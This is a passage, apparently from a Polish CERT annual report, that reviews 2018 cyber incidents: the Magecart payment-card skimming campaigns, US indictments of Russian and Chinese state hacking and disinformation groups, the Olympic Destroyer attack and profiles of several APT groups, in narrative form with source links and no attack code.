W 2018 nasilił się trend, który obserwujemy od 2015 roku. Zjawisko okrzyknięte mianem „Magecart” jest kompilacją tych dwóch sposobów kradzieży. W tym wypadku również przeprowadzony zostaje atak, jednak nie na pojedyncze stacje robocze użytkowników. Celem sprawców jest serwer, na któ-rym znajduje się jedna ze stron internetowych, umożliwiających płatność kartą - np. serwis aukcyjny lub sklep. W przypadku Magecart wykorzystywane są podatności w starszych wersjach platformy Magento a także w wielu wtyczkach do tej platformy tworzonych przez rozmaitych autorów, często już niewspieranych.

Atakujący po przełamaniu zabezpieczeń, umieszcza dodatkowy skrypt na stronie z finalizacją za-mówienia. Jeżeli znajduje się tam formularz do wprowadzenia danych karty płatniczej, dane z niego wysyłane są dodatkowo na serwer kontrolowany przez przestępców.

Rysunek 60. Fragment kodu cyfrowego skimmera Magecart.

Magecart to zarówno nazwa grupy osób zamieszanych w proceder, jak i samej techniki kradzieży. Na podstawie różnic w kodzie, a także wykorzystywania odmiennych technik monetyzacji, jesteśmy w stanie wydzielić przynajmniej kilka niezależnych podgrup korzystających z tego modus operandi.

Atakujący z reguły masowo i w sposób automatyczny przełamywali zabezpieczenia sklepów. Najbar-dziej wpływowe grupy celowały w strony z wysokim ruchem użytkowników, co najprawdopodobniej wymagało dużej ilości dodatkowej pracy manualnej.

Przestępcy zarabiają odsprzedając wykradzione dane innym przestępcom lub też własnoręcznie dokonując zakupów przy użyciu kart.


Rysunek 61. Dane wykradzione z BritishAirways wystawione na sprzedaż, (źródło: RiskIQ).

Jedna z grup stworzyła złożoną sieć, która umożliwiała monetyzację. Za pomocą skradzionych kart kupowali głównie drogą elektronikę o niewielkich gabarytach. Przedmioty odbierali obywatele USA (osoby specjalnie werbowane w tym celu, tzw. „muły”) i odsyłali je dalej do Europy Wschodniej. W celu uwiarygodnienia procederu, przestępcy założyli nawet stronę firmy zajmującej się tzw. reship-pingiem, czyli usługą pośrednictwa przy przesyłaniu paczek, przez co zatrudnione przez nich osoby myślały, że wykonują legalną pracę.

Rysunek 62. Oferta pracy mająca na celu zwerbowanie nieświadomych osób w roli „muła”, (źródło: RiskIQ).

Zjawisko Magecart przyciągnęło większą uwagę opinii publicznej dopiero po ataku na serwis Tic-ketmaster – popularnego dystrybutora biletów na wydarzenia kulturalne. Przestępcy nie włamali się tam bezpośrednio. Zmodyfikowali skrypty jednej z usług, z której korzystał punkt sprzedażowy firmy Inbenta – dostawcy rozwiązań inteligentnego chatu. Tego typu incydenty określa się mianem ataku na łańcuch dostaw (ang. supply chain attack). W tym wypadku zawinił przede wszystkim zespół bezpieczeństwa Inbenta, ponieważ to w ich systemach występowała luka.

Co ciekawe, trzy inne witryny firmy Ticketmaster zostały zainfekowane w ten sam sposób, przy czym atakującym udało się skompromitować zupełnie innego dostawcę usług – SociaPlus.

Z usług tych dwóch platform korzystało w tamtym czasie tysiące sklepów, jednak atakujący postano-wili uderzyć jedynie w największych graczy na rynku.

Do grona zewnętrznych dostawców, którzy ulegli włamywaczom, należą firmy zaprezentowane w tab. 9. 111

111 Źródło: https://cdn.riskiq.com/wp-content/uploads/2018/11/RiskIQ-Flashpoint-Inside-MageCart-Report.pdf


Nazwa firmy Początek incydentu Wykrycie incydentu

Conversions on Demand Grudzień 2016 Kwiecień 2017

Annex Cloud Grudzień 2017 Lipiec 2018

SAS Net Reviews Kwiecień 2017 Lipiec 2017

flashtalking Lipiec 2018 Sierpień 2018

SociaPlus Grudzień 2017 Czerwiec 2018

Inbenta Luty 2018 Czerwiec 2018

PushAssist Czerwiec 2018 Sierpień 2018

Clarity Connect Maj 2017 Lipiec 2018

ShopBack Styczeń 2018 Maj 2018

CompanyBe Maj 2018 Wrzesień 2018

Feedify Sierpień 2018 Wrzesień 2018

Shopper Approved Wrzesień 2018 Wrzesień 2018

Tabela 9. Lista firm zaatakowanych przez Magecart.

AmerykańskieoskarżeniaprzeciwkogrupomAPT

Rok 2018 był wyjątkowy pod względem ilości, opublikowanych przez amerykański Departament Sprawiedliwości, aktów oskarżenia w sprawach związanych z nielegalnymi działaniami w interne-cie przeciwko Stanom Zjednoczonym, dokonanymi przez organizacje powiązane bądź finansowane przez rządy obcych państw. Są one szczególne ze względu na bezpośrednie wskazanie sprawców odpowiedzialnych za wiele z najgłośniej komentowanych w ostatnich latach ataków hakerskich oraz akcji dezinformacyjnych.

Akcje dezinformacyjne “fabryki trolli”

Po doniesieniach amerykańskich służb specjalnych o możliwym wpływie Rosji na wynik wyborów prezydenckich w 2016 r.112, do wyjaśnienia tej sprawy w Departamencie Sprawiedliwości w maju 2017 r. powołano specjalną grupę dochodzeniowo-śledczą pod przewodnictwem byłego dyrekto-ra FBI, Roberta Muellera113. Pośród wszystkich śledztw zakończonych wydaniem aktu oskarżenia w 2018 r.114, dwa z nich dotyczyły rosyjskich ataków hakerskich oraz przeprowadzanych przez nich akcji dezinformacyjnych w internecie.

112 https://www.dni.gov/files/documents/ICA_2017_01.pdf113 https://www.justice.gov/opa/pr/appointment-special-counsel114 https://www.justice.gov/sco


W lutym 2018 r. grupa Muellera oskarżyła trzy rosyjskie firmy, w tym “Internet Research Agency” oraz powiązanych z nimi 12 osób115.

Rysunek 63. Początek aktu oskarżenia przeciwko Internet Research Agency.

Akt oskarżenia zarzuca firmie oraz jej pracownikom przeprowadzanie regularnych akcji dezinforma-cyjnych począwszy już od 2014 r. Wielu byłych pracowników firmy chętnie wypowiadało się o szcze-gółach pracy w amerykańskich mediach. Jeden z nich w wywiadzie z radiem WTOP116 przyznał, że w firmie pracowało wówczas ponad 600 osób w 12-godzinnych zmianach. Każdego ranka pracowni-cy mieli otrzymywać polecenie pisania w internecie komentarzy zgodnych ideowo z przedstawionym na dany dzień planem działania. Były one pochlebne wobec działań rosyjskiego rządu i zamieszcza-ne zarówno na rosyjskojęzycznych portalach, jak i w zagranicznych mediach społecznościowych, w tym na Facebooku. Według aktu oskarżenia, w czasie trwania kampanii wyborów prezydenckich w 2016 r., wykorzystywano zarówno fałszywe jak i przejęte profile amerykańskich aktywistów, grup oraz stron. Celem było osłabienie zaufania amerykańskich obywateli do procesu wyborczego, po-lityków oraz rządu Stanów Zjednoczonych. W późniejszym okresie trwania kampanii pracownicy Internet Research Agency mieli wspierać jednego z kandydatów.

Firma Internet Research Agency finansowana jest przez oskarżonego w akcie Jewgienija Prigożyna, rosyjskiego biznesmena, który ma bliskie związki z Władimirem Putinem117.

Pracownicy firmy byli do zadania dobrze przygotowani - pisali komentarze tylko podczas dnia w amerykańskich strefach czasowych, używali do tego serwerów pośredniczących znajdujących się w Stanach Zjednoczonych. Byli także bardzo dobrze zorientowani w niuansach prowadzenia kam-panii wyborczych.

Amerykańskie media oraz byli pracownicy Internet Research Agency118 określają firmę mianem “fa-bryki trolli”. A pojęcie “trolli z Olgino”, czyli dzielnicy Sankt Petersburga, w której znajdowała się ”fabryka”, w rosyjskim slangu stało się synonimem zorganizowanych działań rosyjskiej propagandy w internecie119.

115 https://www.justice.gov/file/1035477/download116 https://wtop.com/j-j-green-national/2018/09/tale-of-a-troll-inside-the-internet-research-agency-in-russia/117 https://en.crimerussia.com/gromkie-dela/navalny-asks-fsb-to-investigate-putin-s-cook/118 https://www.nytimes.com/2018/02/18/world/europe/russia-troll-factory.html119 https://en.wikipedia.org/wiki/Internet_Research_Agency#Origin


Rysunek 64. Jedna z siedzib Internet Research Agency, fot. Mstyslav Chernov/Associated Press.

Główna księgowa firmy, Jelena Husiajnowa, po dochodzeniu FBI została oskarżona we wrześniu 2018 r. o dokonanie oszustwa wobec Stanów Zjednoczonych120. Husiajnowa miała zarządzać bu-dżetem w wysokości przekraczającej nawet milion dolarów miesięcznie. Akt oskarżenia zdradza również nazwę operacji, pod którą prowadzone były działania dezinformacyjne: “Projekt Łachta”.

DziałaniaAPT28wobecKrajowegoKomitetuPartiiDemokratycznej

W lipcu 2018 r. grupa Muellera doprowadziła do oskarżenia 12 oficerów rosyjskiego wywiadu woj-skowego (“GRU”) z jednostek o numerach 26165 i 74455 w związku z ich działaniami podczas wyborów prezydenckich w 2016 r121. Miały one polegać przede wszystkim na nielegalnym pozyski-waniu różnego rodzaju dokumentów i materiałów, które następnie były publikowane w odpowiednich momentach, aby jak najbardziej wpłynąć na amerykańską opinię publiczną.

Rysunek 65. Fragment aktu oskarżenia przeciwko GRU.

120 https://www.justice.gov/opa/press-release/file/1102316/download121 https://www.justice.gov/file/1080281/download


Akt oskarżenia w sposób jednoznaczny przypisuje atrybucję ataków (które opisywaliśmy w rapor-cie za rok 2016122) na Krajowy Komitet Partii Demokratycznej i jej szefa, Johna Podestę, z którego prywatnej skrzynki e-mailowej wykradziono dużą ilość wrażliwych dokumentów. Śledczy dokładnie opisują działania podjęte przez poszczególnych oficerów oraz używane przez nich metody działa-nia i narzędzia (w tym złośliwe oprogramowanie). Opisuje także przebieg kampanii phishingowych przeprowadzanych na pracownikach oraz sposób infiltracji i metod ukrywania swoich działań w in-frastrukturze komitetu Hillary Clinton.

Dotychczas firmy zajmujące się cyberbezpieczeństwem ataki na Krajowy Komitet Partii Demokra-tycznej przypisywały dwóm grupom, którym nadano przydomek “Fancy Bear” / “APT28” oraz “Cozy Bear” / “APT29”. Choć już wcześniej podejrzewano “APT28” o związki z rosyjskim wywiadem woj-skowym, dochodzenie FBI zwieńczone postawionym aktem oskarżenia jest pierwszą tak zdecydo-waną próbą zidentyfikowania atakujących.

Śledczy opisują również metody publikacji skradzionych dokumentów. Odbywały się one za pomocą założonej przez przestępców strony internetowej DCLeaks.com oraz fałszywej persony “Guccifer 2.0”. Strona “DCLeaks” miała być zarządzana i promowana przez fałszywe profile amerykańskich aktywistów. “Guccifer 2.0” miał z kolei służyć zrzuceniu odpowiedzialności za ataki na działającego w pojedynkę rumuńskiego hakera. Chętnie udzielał on przez internet wypowiedzi różnym mediom, które już w czerwcu 2016 r. zweryfikowały, że rumuński haker musi używać internetowych translato-rów do wypowiadania się w swoim “ojczystym” języku123, a w swoich notkach na blogu używa emoti-kon zapisywanych w sposób specyficzny dla używających rosyjskiego układu klawiatury.

Rysunek 66. Blog Guccifera 2.0.

122 https://www.cert.pl/PDF/Raport_CP_2016.pdf#page=35123 https://motherboard.vice.com/en_us/article/d7ydwy/why-does-dnc-hacker-guccifer-20-talk-like-this


DziałaniaAPT28wobecagencjiantydopingowych

W 2016 r. byliśmy świadkami ataków hakerów i prób dyskredytacji dwóch międzynarodowych in-stytucji odpowiedzialnych za zwalczanie dopingu w sporcie: WADA, czyli Światowej Agencji Anty-dopingowej i jej instytucji odwoławczej CAS, czyli Trybunału Arbitrażowego do spraw Sportu. Nie-znani wówczas sprawcy za pomocą ataków phishingowych przejęli dane dostępowe do systemu wspomagającego przeprowadzanie kontroli antydopingowych (ADAMS). Jako jedne z pierwszych przejęte zostało m.in. konto Juliji Rusanowej, sygnalistki nieprawidłowości dopingowych w rosyjskiej reprezentacji olimpijskiej. Ostatecznie WADA przyznała, że wyciekły dane przynajmniej 41 zawodni-ków124. Wykradzione zostały również dane z bazy danych strony internetowej CAS. W końcu na pro-filu twitterowym o nazwie Anonymous Poland (@anpoland) opublikowane zostały dane redaktorów strony CAS. Pojawiła się także zapowiedź publikacji danych zawodników, które ostatecznie ukazały się na stronie “fancybear.net”. Upublicznione dokumenty zawierały dane medyczne dotyczące wyni-ków kontroli antydopingowych oraz wyjątkowe dopuszczenia w stosowaniu konkretnych substancji. Zaatakowane miały być też strony internetowe amerykańskiej reprezentacji olimpijskiej (teamusa.org) oraz Międzynarodowego Komitetu Paraolimpijskiego (paralympic.org)125.

Rysunek 67. Publikacja danych z wycieku ze strony CAS.

Co ciekawe, strona “fancybear.net” miała się kojarzyć właśnie z grupą Fancy Bear / APT28. Bada-cze z bloga “Jump ESP, jump!” sugerowali, że był to jeden z elementów, który miał zdyskredytować Rosję126.

Amerykanie tę akcję również przypisali rosyjskiemu wywiadowi wojskowemu. W akcie oskarżenia, złożonym w październiku 2018 r.127, na ponad 40 stronach dokładnie opisują działania oficerów GRU przeprowadzane od 2014 r. do co najmniej maja 2018 r. Na liście celów rosyjskich hakerów, oprócz WADA i CAS, znalazły się również: Amerykańska Agencja Antydopingowa (USADA), Kanadyjskie Centrum dla Etyki w Sporcie (CCES), Międzynarodowe Stowarzyszenie Federacji Lekkoatletycz-nych (IAAF), FIFA oraz organizacje niezwiązane ze sportem, takie jak: firma energetyki jądrowej We-stinghouse Electric Company w USA, Organizacja ds. Zakazu Broni Chemicznej oraz szwajcarskie Laboratorium Chemiczne w Spiez, które badało środki chemiczne wykorzystane w ataku w Salisbury w marcu 2018 r.

Według amerykańskich śledczych ataki na organizacje związane ze zwalczaniem dopingu miały na celu ich dyskredytację w oczach opinii publicznej. Działo się to w czasie trwania skandalu do-tyczącego dopingu w rosyjskiej reprezentacji olimpijskiej128. W lipcu 2016 r. WADA zarekomendo-wała Międzynarodowemu Komitetowi Olimpijskiemu (MKOl) niedopuszczenie do letnich igrzysk w Rio de Janeiro całej rosyjskiej reprezentacji. Kilka dni później CAS oddalił apelację w sprawie dyskwalifikacji kilkudziesięciu rosyjskich zawodników. Na początku sierpnia 2016 r. MKOl dopuścił

124 https://www.wada-ama.org/en/media/news/2016-09/cyber-hack-update-data-leak-concerning-41-athletes-from-13-countries-and-17125 http://web.archive.org/web/20160908145346/https://twitter.com/anpoland126 https://webcache.googleusercontent.com/search?q=cache:HX8PZRnMOwYJ:https://jumpespjump.blogspot.com/2016/10/why-i-believe-wada-was-not-hacked-by.html127 https://en.wikipedia.org/wiki/Doping_in_Russia#August_to_September_2016128 https://en.wikipedia.org/wiki/Internet_Research_Agency#Origin


rosyjską reprezentację, ale bez 111 z 389 zgłoszonych zawodników. Z kolei Międzynarodowy Komitet Paraolimpijski zdyskwalifikował całą rosyjską reprezentację paraolimpijską, a odwołanie od tej decy-zji wkrótce odrzucił CAS.

Akt oskarżenia opisuje metody, środki techniczne (złośliwe oprogramowanie, w tym “XAgent” i “XTunnel”) i fałszywe profile aktywistów, za pomocą których rozpowszechniano skradzione infor-macje. Wśród nich znalazła się również wspomniana wcześniej persona sugerująca udział w ata-kach polskich hakerów: “Anonymous Poland”. Używano jej później do publikacji danych z innych wycieków, w tym próbie pogorszenia stosunków polsko-ukraińskich. Szczegółowo opisaliśmy je w raporcie za 2017 r.129

Podobnej atrybucji dokonało także brytyjskie Narodowe Centrum Cyberbezpieczeństwa w informacji prasowej z października 2018 r.130

Rysunek 68. Dokładny opis ataku na jednego z pracowników WADA.

SzpiegostwoprzemysłowewwydaniuAPT10

Ostatni analizowany przez nas akt oskarżenia z grudnia 2018 r.131 stawia zarzuty dwóm obywate-lom Chin, pracownikom firmy Huaying Haitai, powiązanej z jednym z chińskich ministerstw. Byli to członkowie grupy APT10, zajmującej się głównie szpiegostwem przemysłowym na rzecz chińskich agencji wywiadowczych.

Choć w akcie oskarżenia nie wymieniono z nazwy konkretnych firm czy instytucji, z których zostały wykradzione wrażliwe informacje (jako wyjątek podając wśród ofiar NASA oraz jej laboratorium JPL), wskazuje się, że przez ostatnie 12 lat APT10 zaatakowało ponad 45 amerykańskich firm i instytucji z następujących branż: lotniczej, technologii satelitarnych oraz morskich, automatyki przemysłowej, dostaw dla przemysłu motoryzacyjnego, narzędzi laboratoryjnych, bankowości i finansów, telekomu-nikacyjnej i elektroniki konsumenckiej, wytwarzania mikroprocesorów, usług IT, doradztwa, wytwa-

129 https://www.cert.pl/PDF/Raport_CP_2017.pdf#page=40130 https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposed131 https://www.justice.gov/file/1121706/download


rzania opakowań i narzędzi medycznych, medycznej, technologii biomedycznych, farmaceutycznej, wydobywczej i paliwowej. Atakowane były również firmy i instytucje z kilkunastu innych krajów.

Śledztwo prowadzone było przez FBI w bliskim porozumieniu z jej wojskowym odpowiednikiem - DCIS, ponieważ najpoważniejszym badanym atakiem APT10 w ostatnim czasie było włamanie do systemów komputerowych amerykańskiej marynarki wojennej. Przestępcy wykradli wrażliwe dane osobowe ponad 100 tysięcy amerykańskich żołnierzy oraz pracowników cywilnych.

Rysunek 69. Fragment plakatu FBI.

Podsumowanie

Warta podkreślenia jest duża szczegółowość opisów przeprowadzonych ataków oraz atrybucja na poziomie działań konkretnych osób, żołnierzy i oficerów. Znane są również ich personalia, aliasy, stopnie oraz miejsca pracy lub służby. Można domniemywać, że amerykańska prokuratura poświęci-ła bardzo dużo środków, aby postawić zarzuty, a następnie postarać się o wydanie nakazów areszto-wania osób, które najprawdopodobniej ze względu na swoje obecne miejsca pobytu nigdy nie staną przed amerykańskim sądem.

Przeanalizowane akty oskarżeń są natomiast bardzo wyraźnym ostrzeżeniem przed tymi, którzy do-konują ataków hakerskich oraz przeprowadzają akcje dezinformacyjne przeciwko amerykańskiemu rządowi, jej firmom, obywatelom i organizacjom. Akty oskarżenia są dowodem na to, że wszystkie ataki zostaną dokładnie zbadane, a ich sprawcy zdemaskowani.

Wszystkie omówione akty oskarżeń dostępne są do pobrania pod następującymi adresami:

- https://www.justice.gov/file/1035477/download (przeciwko “fabryce trolli”),- https://www.justice.gov/file/1102316/download (oskarżenie księgowej “fabryki trolli”),- https://www.justice.gov/file/1080281/download (w sprawie wpływu na wybory),- https://www.justice.gov/file/1098481/download (w sprawie ataków na WADA/CAS),- https://www.justice.gov/file/1121706/download (w sprawie szpiegostwa przemysłowego).


Atak na Zimowe Igrzyska Olimpijskie (Olympic Destroyer)

Jeszcze przed rozpoczęciem Zimowych Igrzysk Olimpijskich w Korei Południowej w 2018 roku, firma McAfee przedstawiła opis132 ataków phishingowych skierowanych na jeden z adresów e-mailowych organizatorów imprezy. Wiadomość miała pochodzić od koreańskiego Centrum Antyterrorystycz-nego, które w tamtym czasie przeprowadzało ćwiczenia na terenach Igrzysk. Dokument będący załącznikiem do wiadomości prowadził do pobrania i uruchomienia złośliwego oprogramowania, choć na tamten moment jeszcze względnie uśpionym - pozyskującym jedynie informacje o systemie i organizacji sieci.

Rysunek 70. Fałszywa wiadomość phishingowa.

W dniu ceremonii otwarcia kibice zaczęli zgłaszać problemy z dostępem do strony internetowej imprezy oraz funkcji drukowania biletów. Dziennikarze w centrum prasowym byli z kolei pozbawieni dostępu do internetu i przekazów telewizyjnych. Przywrócenie działania usług zajęło 12 godzin. Dwa dni później organizatorzy Igrzysk przyznali, że powodem awarii były ataki hakerskie z użyciem zło-śliwego oprogramowania, jednak nie chcieli zdradzić szczegółów.

Już tego samego dnia próbki złośliwego oprogramowania użytego w ataku trafiły do firm zajmują-cych się bezpieczeństwem IT. Jako pierwsi, kilka dni później, techniczną analizę przedstawili bada-cze z firmy Cisco Talos133. Jak piszą, główny plik wykonywalny badanej przez z nich próbki zawierał w sobie wiele modułów odpowiedzialnych za poszczególne funkcje złośliwego oprogramowania.

Pierwszy z modułów odpowiedzialny był za automatyczne rozprzestrzenianie się złośliwego opro-gramowania na komputery w sieci lokalnej i domenowej. Chcąc zainfekować kolejne maszyny, nale-żało pozyskać dane uwierzytelniające, do czego służyły dwa kolejne moduły. Jeden z nich wykradał zapisane hasła z przeglądarek internetowych, a drugi hasła użytkowników zalogowanych w syste-mie operacyjnym. Co ciekawe, były one zapisywane w samym pliku wykonywalnym używanym do kolejnych infekcji. Próbka badana przez Cisco Talos, w czasie swojego rozprzestrzeniania się w sieci organizatorów Igrzysk, pozyskała dane uwierzytelniające aż 44 kont.

Najważniejszym modułem Olympic Destroyera, jak zostało nazwane to złośliwe oprogramowanie, był ten, który próbował ostatecznie uszkodzić zainfekowany system. Po usunięciu kopii zapasowych oraz funkcji przywracania systemu, próbka usiłowała nieodwracalnie nadpisać dostępne pliki oraz skonfigurować system tak, aby nie było możliwe jego ponowne uruchomienie, oraz wyłączyć kom-puter.

122 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/123 https://blog.talosintelligence.com/2018/02/olympic-destroyer.html


W następnych dniach po incydencie media oraz badacze bezpieczeństwa IT próbowali dokonać atrybucji ataku, ale pojawiło się wiele wykluczających się ze sobą teorii. Wszystkie z nich podsu-mował późniejszy raport Cisco Talos134. Jedna z nich wskazywała na powiązania próbki złośliwego oprogramowania z tymi wykorzystywanymi przez północnokoreańską grupę Lazarus: podobne na-zewnictwo plików, kod niszczenia zawartości plików (choć był on w tym momencie już publiczny) oraz część nagłówka pliku wykonywalnego, co oznaczało bezpośrednie skopiowanie go z próbek Lazarusa. Druga teoria wskazywała na powiązania z chińskimi grupami APT3 oraz APT10. Firma Intezer wskazywała135 na podobieństwa w metodzie generowania kluczy do szyfrowania komunikacji oraz sposobie wykradania danych uwierzytelniających kont systemowych. Jednak ostatecznie wy-kazano, że oba pochodzą z programu Mimikatz, którego kod jest publicznie dostępny. Z kolei sam sposób rozprzestrzeniania się miał elementy zbieżne z kodem NotPeyta, choć Olympic Destroyer nie wykorzystywał do tego podatności w systemie operacyjnym.

Pod koniec lutego 2018 r. w gazecie Washington Post ukazał się materiał136 powołujący się na ano-nimowe wypowiedzi przedstawicieli amerykańskiego rządu. Miały one zgodnie mówić, że według do-chodzenia amerykańskich agencji wywiadowczych jednoznacznie winę za ataki na Zimowe Igrzyska Olimpijskie należy przypisać grupie hakerów działających w ramach rosyjskiego wywiadu wojsko-wego - GRU. Wszystkie “fałszywe flagi” w kodzie i metodach złośliwego oprogramowania przypisu-jące atrybucję, w szczególności północnokoreańską, miały być umieszczone z pełną premedytacją. Ostatecznie zainfekowanych miało być kilkaset komputerów w infrastrukturze Igrzysk Olimpijskich.

Co ciekawe, nie było to ostatnie wykorzystanie Olympic Destroyera w 2018 roku. Na przestrzeni maja i lipca firma Kaspersky zaobserwowała137 serię ataków phishingowych, które bardzo przypomi-nały te z początku roku. Atakowane były organizacje z Francji, Holandii, Szwajcarii, Niemiec, Ukra-iny, ale także rosyjskie instytucje finansowe. Specjalną uwagę badaczy zwróciły dwa dokumenty użyte w atakach phishingowych. Oba związane były z atakiem na Siergieja Skripala oraz jego córkę w Salisbury w marcu 2018 roku. Jeden dokument bezpośrednio dotyczył środka chemicznego użytego w ataku, a drugi warsztatów przeprowadzanych przez szwajcarskie Laboratorium Spiez, które bada-ło truciznę. Warto podkreślić, że kilka miesięcy później Stany Zjednoczone wniosły akt oskarżenia przeciwko rosyjskim hakerom z GRU138, w którym zarzucają im ataki właśnie na to laboratorium.

Rysunek 71. Dokument z wiadomości ataku phishingowego.

134 https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/135 http://www.intezer.com/2018-winter-cyber-olympics-code-similarities-cyber-attacks-pyeongchang/136 https://www.washingtonpost.com/world/national-security/russian-spies-hacked-the-olympics-and-tried-to-make-it-look-like-north-korea-did-it-us-officials-say/2018/02/24/44b5468e-18f2-11e8-92c9-376b4fe57ff7_story.html137 https://securelist.com/olympic-destroyer-is-still-alive/86169/138 https://www.justice.gov/opa/page/file/1098481/download


Zaawansowanezagrożenia

W tej sekcji opisujemy wybrane obserwacje dotyczące działalności grup dysponujących dużymi środkami i arsenałem narzędzi, najczęściej kojarzonych ze służbami specjalnymi różnych krajów.

Fancy Bear / APT28

Grupa APT28 regularnie przeprowadza ataki na instytucje państwowe, organizacje powiązane z bezpieczeństwem narodowym oraz cele związane z aktualnie prowadzoną polityką zagraniczną przez rząd rosyjski. Dużo światła na liczne działania i operacje prowadzone przez hakerów rosyjskie-go wywiadu wojskowego rzucają akty oskarżenia wydane w 2018 r. przez amerykański departament sprawiedliwości. Opisujemy je szerzej w osobnym artykule (str. 91), podobnie jak przypisywany im przez amerykanów atak na Zimowe Igrzyska Olimpijskie (str. 96).

Lazarus / BlueNoroff / APT38

Zespół pochodzący z Korei Północnej odpowiedzialny za atak na polskie instytucje finansowe w 2016/2017 roku139. Kaspersky Lab wyróżnił wewnątrz struktury grupy dedykowaną podgrupę o nazwie BlueNoroff140, specjalizującą się w kradzieżach środków finansowych oraz kryptowalut.

Z obserwacji CERT Polska wynika, że w 2018 r. grupa Lazarus swoją działalność prowadziła głównie na obszarze Azji i Ameryki Południowej. Sporadycznie infekcje zdarzały się w Europie - głównie w Turcji. Nie obserwowaliśmy kampanii celowanych w polskie instytucje. Interesującym celem ataku przeprowadzonego w Ameryce Centralnej było kasyno internetowe. W jego sieci zostały znalezione narzędzia, które były wykorzystywane również do przeprowadzenia ataku na polski sektor finanso-wy: wiper KillDisk oraz backdoor NukeSped141.

Grupa przejęła pomysł na azjatyckie kampanie od twórców malware’u mobilnego, którzy bardzo czę-sto podszywali się pod aplikacje służące do obrotu kryptowalutami. Wybór cyberprzestępców padł na program Celas Trade Pro. Jednak z tą różnicą, że nie dystrybuowano instalatora z backdoorem, tylko złośliwy kod pobierał się wspólnie z aktualizacją programu.

Rysunek 72. Interfejs użytkownika programu Celas Trade Pro.

139 Więcej szczegółów w raporcie CERT Polska za 2017 rok.140 https://securelist.com/lazarus-under-the-hood/77908/141 https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/


Malware FALLCHILL był dedykowany systemom Windows oraz OS X i służył jako typowe opro-gramowanie Remote Access Tool142. Był to pierwszy etap ataku, w którym wyselekcjonowane ofia-ry otrzymywały innego backdoora o ciekawej charakterystyce: nagłówki do komunikacji HTTP w próbce były zapisane na stałe i zawierały ciąg znaków, który jednoznacznie wskazuje na północno-koreańskie pochodzenie: “Accept-Language: ko=-kp,ko-kr;q0=8.,ko;q0=6.,en-us;q-0.4,en;q=0.2”

Rysunek 73. Nagłówki zapisane w próbce FAILCHILL, (źródło: Kaspersky Lab).143

Twórcy scenariuszy operacji Lazarus wykazują się dużą kreatywnością. Do systemu firmy Redbanc, obsługującego sieć bankomatów w Chile, włamano się poprzez atak na dewelopera firmy znale-zionego na LinkedIn144. Otrzymał on zaproszenie na rozmowę rekrutacyjną przez Skype’a, a przed połączeniem został namówiony do uruchomienia aplikacji zbierającej dane dotyczące preferencji i warunków rekrutacji, która była złośliwym oprogramowaniem. Umożliwiło to stworzenie punktu wej-ścia do sieci i umieszczenia w niej implantów z PowerRatankba145.

Rysunek 74. Fałszywy program do rekrutacji programistów wykorzystywany do infekcji przez APT38.

142 https://www.fortinet.com/blog/threat-research/a-deep-dive-analysis-of-the-fallchill-remote-administration-tool.html143 https://securelist.com/operation-applejeus/87553/144 https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/145 https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf


LuckyMouse / APT27

Jednostka powiązana z Chińską Republiką Ludową obecnie przeprowadzająca operacje ofensywne przeciwko państwom na obszarze Azji. Portfolio ofiar nie koncentruje się tylko na obszarze wschod-nim: grupa była również odpowiedzialna za włamania do sieci europejskiego przedsiębiorstwa zaj-mującego się budową dronów oraz francuskiej firmy z branży energetycznej146. Przez pewien czas jednostka była uśpiona, stała się bardzo aktywna w 2018 roku.

Jednym z najbardziej spektakularnych ataków w 2018 roku jest przejęcie rządowego centrum da-nych celem pozyskania informacji oraz przeprowadzania ataków metodą wodopoju147, zastosowaną m.in. w ataku na polski sektor finansowy. Do infekcji ofiar grupa głównie wykorzystywała exploita na dobrze znaną podatność w pakiecie Microsoft Office, CVE-2017-11882148.

Cyberprzestępcy korzystają z autorskiego oprogramowania ze wstawkami z otwartoźródłowego kodu, najczęściej z serwisu Github. Atak przeprowadzony w marcu 2018 r. z użyciem fałszywego sterownika NDISProxy, który wykorzystywał skradziony podpis cyfrowy chińskiej firmy zajmującej się rozwiązaniami bezpieczeństwa LeagSoft149. Interesujący jest fakt, że przestępcy nie przeprowadzali kampanii mailingowej, lecz ręcznie instalowali złośliwe oprogramowanie we wcześniej skompromi-towanych sieciach.

APT10

APT10 to kolejna grupa powiązana z Chinami. Jej głównym zadaniem jest prowadzenie szpiegostwa przemysłowego w internecie i przekazywanie danych technologicznych chińskim firmom. Ich opera-cje przeciwko amerykańskim instytucjom oraz głośny wyciek danych osobowych ponad 100 tysięcy amerykańskich żołnierzy i pracowników cywilnych Marynarki Wojennej przedstawiamy w artykule o amerykańskich aktach oskarżeń (patrz str. 89).

BlackEnergy & GreyEnergy / TeleBots

Pod nazwami BlackEnergy & GreyEnergy / TeleBots działa rosyjski aktor APT działający w obszarze infrastruktury krytycznej, który jest przede wszystkim znany ze spowodowania blackoutu na Ukrainie pod koniec 2015 roku150. W branży bezpieczeństwa teleinformatycznego ten atak jest uważany za pierwszy skuteczny cyberatak na sieć elektryczną: wyłączone zostało 30 podstacji, a bez prądu po-zostało 230 tysięcy osób. W repertuarze udanych ataków tej grupy znajduje się jeszcze ransomware NotPetya, który również zaatakował Ukrainę151 oraz malware Industroyer dedykowany systemom sterowania przemysłowego Siemens SIPROTEC152.

Badacze z firmy ESET śledzący działalność BlackEnergy przypuszczają, że po ostatnim ataku grupa została podzielona na dwa zespoły: GreyEnergy oraz TeleBots153. GreyEnergy zajmuje się sprawami ataków na infrastrukturę i procesy przemysłowe, a TeleBots jest dedykowany atakom mającym na celu zniszczenie danych, przerwanie ciągłości działania oraz pozyskiwanie informacji154.

Na początku drugiego kwartału 2018 r. grupa TeleBots rozpoczęła ataki za pomocą nowego, autor-skiego backdoora o nazwie Exaramel. Ta rodzina dedykowana jest zarówno platformie Windows, jak i Linux oraz wykazuje szereg podobieństw z komponentem backdoora zawartym w Industroyerze. Pozwoliło to na szybką atrybucję ataku o wysokim stopniu ufności.

